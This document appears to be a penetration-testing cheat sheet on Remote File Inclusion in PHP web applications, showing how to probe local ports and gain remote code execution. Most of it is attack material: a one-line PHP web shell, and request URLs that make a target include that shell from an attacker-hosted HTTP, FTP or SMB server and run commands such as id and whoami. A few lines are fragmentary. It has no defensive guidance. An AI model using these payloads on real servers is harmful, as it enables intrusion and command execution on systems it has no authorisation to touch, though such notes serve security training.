Remote File Inclusion (RFI)

• The vulnerable function allows the inclusion of remote URLs. This allows two main benefits:

  1. Enumerating local-only ports and web applications (i.e. SSRF)

  2. Gaining remote code execution by including a malicious script that we host

• Almost any Remote File Inclusion vulnerability is also an Local File Inclusion (LFI) vulnerability, as any function that allows including remote URLs usually also allows including local ones

  • an LFI may not necessarily be an RFI.

    • The vulnerable function may not allow including remote URLs

    • You may only control a portion of the filename and not the entire protocol wrapper (ex: http://, ftp://, https://).

    • The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default

http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php

Remote Code Execution with RFI

 echo '<?php system($_GET["cmd"]); ?>' > shell.php

• start a

http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

FTP

• if FTP is blocked use FTP server

  • setup ftp server

http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id

• cli version

 curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'

SMB

• if a windows web server is being used

  Copy

  impacket-smbserver -smb2support share $(pwd)

http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami